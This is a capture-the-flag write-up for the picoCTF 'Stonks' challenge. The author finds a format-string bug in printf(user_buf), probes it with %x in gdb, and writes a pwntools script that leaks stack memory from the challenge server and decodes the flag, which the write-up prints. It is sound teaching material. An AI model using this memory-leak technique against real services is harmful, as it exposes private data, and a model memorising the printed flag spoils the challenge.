# Write up for: Stonks

> Author: mongoosymongoose

## Thought Process
The first thing I do is compile the program, and get the following warning: 

```bash
vuln.c:93:2: warning: format not a string literal and no format arguments [-Wformat-security]
   93 |  printf(user_buf);
      |  ^~~~~~

```

When I try to run it, the program doesn't do much because it's looking for a flag file. Since we have the source code, it's easy enough to start poking around and see what's going on. 

### Looking at the Source Code

Following the code flow from main to `buy_stonks`, it's made clear that the program expects a file titled `api`. The program will read in 128 bytes from this file, but for now I'm going to leave it blank. 

```bash
touch api
```

After I created the `api` file, I re-ran the program. This time I was able to make it further, and got to a second user-input. This time it's asking for my API token. Looking at the code, it's going to read this into a buffer with the size of 301. This input is then immediately printed to the user. 

Looking back at the warning I get when I compiled this, I'm going to focus on the `printf` on line 93. If I pass in letters and / or numbers, the program continues as normal, generating stocks and shares. If I pass in a format string (i.e. `%s`), I start to see unexpected data printed to me. 

```bash

Welcome back to the trading app!

What would you like to do?
1) Buy some stonks!
2) View my portfolio
1
Using patented AI algorithms to buy stonks
Stonks chosen
What is your API token?
%d
Buying stonks with token:
-593369309
Portfolio as of Fri 17 Sep 2021 07:47:51 AM PDT


32 shares of U
71 shares of OK
1027 shares of UV
55 shares of YJWF
Goodbye!

```

I then re-ran the program with gdb and started to poke around. Running `backtrace full` gave me the following information. 

```
(gdb) backtrace full
#0  buy_stonks (p=0x5555555592a0) at vuln.c:93
        api_buf = "\025\000\000\000\000\000\000\000@\362\372\367\377\177\000\000h\r\000\000\000\000\000\000\n\000\000\000\000\000\000\00
0\240\006\373\367\377\177\000\000QaUUUU\000\000\020\200UUUU\000\000\240\024\373\367\377\177\000\000\000\000\000\000\000\000\000\000\023\
200\345\367\377\177\000\000\024\000\000\000\000\000\000\000\240\006\373\367\377\177\000\000QaUUUU\000\000\032\267\344\367\377\177\000\00
0\020XUUUU\000\000\020\337\377\377\377\177\000"
        f = 0x5555555596d0
        money = 0
        shares = 5
        temp = 0x55555555a960
        user_buf = 0x55555555a980 "%x%x%x%x"
#1  0x00005555555557d3 in main (argc=1, argv=0x7fffffffe008) at vuln.c:139
        p = 0x5555555592a0
        resp = 1

```

`api_buf` sure does look interesting! At this point I'm starting to build my solution script. 

## Creating the solution

After messing with formatting, I have this so far: 

```python
from pwn import *

# Getting to the second user-input part
r = remote('mercury.picoctf.net', '59616')
r.recvuntil("View my portfolio")
r.sendline('1')
r.recvuntil("What is your API token")

# Pass in %x to see what I will get 
r.sendline('%x')

r.recvuntil('Buying stonks with token:\n')

data = r.recvline().decode("utf-8")
print(f"Data....\n{data}")

```

This is what I get back, which looks promising: 

```
Data....
9d0f350
```
Next I update the program to get more than just 8 Bytes of data and mess with formatting so it is easier to manipulate. I separate the data into a list, and need to decode / fix the data. I am terrible with python, so this took longer than it needed to, and I ended with something from a different write up. 

```python
for i in data: 
    print(bytearray.fromhex(i).decode())

```

This works, however not all of the bytes are able to be decoded; so I threw in a try-except block. This gives me the following print out. 

```
ocip
{FTC
0l_I
4_t5
m_ll
0m_y
_y3n
8416
45eb

```

This looks promising! After fixing the order of the letters, and actually adding it to a `flag` variable, I can print out the flag to the screen. One thing I missed is that there's no trailing `}` in my initial flag print-out. After adding it manually, I have my flag! 

```
picoCTF{I_l05t_4ll_my_m0n3y_6148be54}
```

